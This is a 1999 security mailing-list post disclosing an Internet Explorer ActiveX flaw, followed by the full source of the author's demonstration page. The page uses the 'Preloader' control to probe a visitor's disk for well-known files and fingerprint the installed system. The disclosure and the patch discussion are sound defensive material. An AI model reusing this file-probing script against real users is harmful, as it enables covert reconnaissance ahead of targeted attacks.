Date: Wed, 9 Jun 1999 12:22:00 +0100
>From: "Steve Loughran" <slo99@iseran.com>
Subject: ActiveX Security Revisited

The latest Microsoft security bulletin
 http://www.microsoft.com/security/bulletins/ms99-018.asp ) includes two
Internet Explorer patches. The first is a classic stack overrun -a web page
can supply an icon for use when adding to the favourite links list, and a
malformed icon could overrun the stack and so execute arbitrary code.

The second fault is a security hole in ActiveX control, and is a simple
instantiation of the problem covered in  RISKS-18.85 and  RISKS-18.86,
namely than code signing is a far less safe method of software distribution
than a 'sandbox' for untrusted code.

It so happens that one of the ActiveX controls dating from IE3 can be used
to test for the presence or absence of files on a hard disk, and while no
access to the contents is granted, it can be used to build up a picture of
what applications are installed. My demonstration page
 http://www.iseran.com/ActiveX/filesearch.html ) shows a naive script
looking for common windows files in well known places -it could just as
easily look for well known applications as a preamble to an application
specific attack.

The insecure 'Preloader' control has some interesting properties. Firstly,
it is signed by Microsoft, showing that even the inventors of ActiveX and
the entire Win32 API did not test their controls rigorously enough.
Secondly, some distributions of Internet Explorer may have automatically
installed the control, in which case the control download or signature
verification process is bypassed.

It so happens that the default security settings of the Outlook and Outlook
Express e-mail messages, which means anyone could send a web page
referencing the control to any known recipient and stand a moderate chance
of being able to enumerate some disk files, possibly with no visible
notification to the recipient. This strikes me as a more serious problem
than the risk incurred by looking at random web pages, as it enables attacks
targeted at individual recipients.

Within four weeks of notifying Microsoft via their security e-mail alias the
company announced the problem, and withdrew the control from their own web
site, which seems a reasonable response time. Of course, if ActiveX had
included a mechanism whereby the signer of a control could retroactively
revoke that control then it would have been trivial to disable the control
remotely. Instead the company had to patch IE to permanently disable the
control. Few other companies would have this luxury.

While enabling or disabling ActiveX use for web site access is entirely a
matter of preference, I would personally recommend that all users of
Microsoft e-mail applications alter their e-mail client security settings so
that neither ActiveX or scripting language is supported in incoming messages
. This can be done by setting the e-mail security zone to 'restricted'.

     -Steve

-----------------------------------------------------------------------------

<http://www.iseran.com/ActiveX/filesearch.html>

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- *********************************************
* Copyright (c) 1998 The Iseran Project.
* for demonstration purposes only
* For IE3 or IE4 only too; the page is incompatible with Netscape
********************************************* -->
<title>The ActiveX Hard Disk Explorer</title>
</head>

<body bgcolor="#FFFFFF">

<table border="0" width="100%" bgcolor="#000080">
  <tr>
    <td><h1 align="center"><font color="#FFFF80">The ActiveX Hard Disk Explorer</font></h1>
    </td>
  </tr>
</table>

<p>This page uses the ability of the preloader control to report the presence or absence
of a file or url to a controlling script. It loops through a number of &quot;Well
known&quot; files to determine information about the user's system. This information could
be fed back to a web server for marketing reasons, or used to test for the presence of
other security weaknesses which could be exploited. </p>

<p>The example script is not very smart and does not use the results of initial tests to
determine further directions of investigation. For example, even if the absence of the
file c:\boot.ini reliably indicates there is no version of NT installed, the script still
looks for the OS in common locations. The results of individual tests are stored, and
could be used for better searching, or could be fed back to a server with ease.</p>

<p>Examining the source shows how this is could be accomplished. Oh, and
if you mail this to someone who uses Outlook to read their mail, guess
what happens when they get it? Recipients will have to be grateful this
file search is not done after a page load, and that the results are not
sent back to the server.

<p><b>June 1999:</b> Within a few weeks of notifying Microsoft the
errant control has been removed from their site, although there is
nothing to stop mischevious web site authors from serving the control
locally, as is done here. A patch to IE actually disables the control
for good.
</p>
<!-- *********************************************
* This is the ActiveX Object used to look round the system. It can be made to
* fetch a local or remote URL and return success or failure
* For some wierd reason we can get multiple messages running around -maybe race conditions
* which the script needs to compensate for
********************************************* -->

<p>
<object ID="preloader" NAME="preloader" WIDTH="83" HEIGHT="27" align="baseline" border="0"
CLASSID="clsid:16E349E0-702C-11CF-A3A9-00A0C9034920"
codebase="http://www.iseran.com/Redist/iepreld.cab">
  <param name="_ExtentX" value="10">
  <param name="_ExtentY" value="10">
  <param name="enable" value="0">ActiveX not found or enabled; no security risk demonstrable
</object>
</p>
<!-- This is the ActiveX Object used to look round the system -->
<script LANGUAGE="JavaScript">


<!-- 

        //initialise index variable
testNo=-1;

//build an array of files to look for, plus a pair of equal size arrays for the success and failure tests.
//quite  few of the tests are commented out to stop IEx from overflowing with too deep recursion; 
//the code seems to need reworking to prevent this.

function buildArray()
{
        //define data
        c=0;


        files=new Array();
        found=new Array();
        missing=new Array();
        results=new Array();

        files[c]="c:\\autoexec.bat";
        found[c]="A DOS/Win9x or NT platform";
        missing[c]="Windows NT?";
        c++;

        files[c]="c:\\boot.ini";
        found[c]="an NT system";
        missing[c]="no NT";
        c++;

        files[c]="http://localhost/";
        found[c]="Running a local web server";
        missing[c]="no local web server";
        c++;

        files[c]="c:\\windows\\wscript.exe";
        found[c]="windows scripting";
        missing[c]="no windows scripting found.";
        c++;

        files[c]="c:\\Windows\\System\\D3DRM.DLL";
        found[c]="Win9x installation of DirectX";
        missing[c]="No copy of DirectX in the default installation location";
        c++;

        files[c]="c:\\Windows\\tour98.exe";
        found[c]="Windows 98";
        missing[c]="No Windows 98 in the usual place";
        c++;

        files[c]="c:\\Winnt\\system32\\gdi32.dll";
        found[c]="A copy of NT under c:\winnt";
        missing[c]="no copy of NT there";
        c++;

        files[c]="c:\\Windows\\system32\\gdi32.dll";
        found[c]="A copy of NT under c:\windows: probably an upgrade installation";
        missing[c]="no copy of NT there";
        c++;
/*
        files[c]="c:\\WindowsNT\\system32\\gdi32.dll";
        found[c]="A copy of NT under c:\windowsNT : probably an MIS installation";
        missing[c]="no copy of NT there";
        c++;

        files[c]="c:\\Program Files\\WinZip\\winzip32.exe";
        found[c]="WinZip. But is it registered?";
        missing[c]="no copy of Winzip in the default install location";
        c++;
*/

}


function println(text)
{
        output.value=output.value+"\r\n"+text;
}


function resetTest()
{
        output.value="";
        testNo=-1;
}


function TestElementFailed()
{
        if(testNo>=0 && testNo<files.length)
                {
                println(preloader.URL+" missing: "+ missing[testNo]);
                startNextTest();
                }
}

function TestElementSucceeded()
{
        if(testNo>=0 && testNo<files.length)
                {
                println(preloader.URL+" found: "+found[testNo]);
                startNextTest();
                }
}

function startNextTest()
{
        testNo++;
        preloader.Enable=0;
        if(testNo>=files.length)
                {
                println("***Test completed***");
                }
        else
                {
                preloader.URL=files[testNo];
                preloader.Enable=1;
                }
}

function startUp()
{
        resetTest();
        output.value="***starting***"
        buildArray();
        startNextTest();
}
//-->

</script>
<!-- *********************************************
* Event handler: success
********************************************* -->
<script LANGUAGE="JavaScript" FOR="preloader" EVENT="Complete()">

<!--
TestElementSucceeded()

//-->

</script>
<!-- *********************************************
* Event handler: failure
********************************************* -->
<script LANGUAGE="JavaScript" FOR="preloader" EVENT="Error()">

<!--
TestElementFailed()

//-->

</script>
<!-- *********************************************
* a link to start the process
********************************************* -->


<h2 align="center"><a href="javascript:startUp()">Run the Test</a></h2>
<!-- *********************************************
* A form for the results
********************************************* -->

<p><textarea rows="20" cols="80" name="output"> 
</textarea></p>
<IMG SRC="../Artwork/bar.jpg" WIDTH="500" HEIGHT="20" ALIGN="BOTTOM" BORDER="0"></P>

<P> [<a href="./">back</a>]
[<A HREF="../">home</A>] 
[<A HREF="../copyright.html">copyright</A> ]
[<A HREF="../software.html">software</A>]

</body>
</html>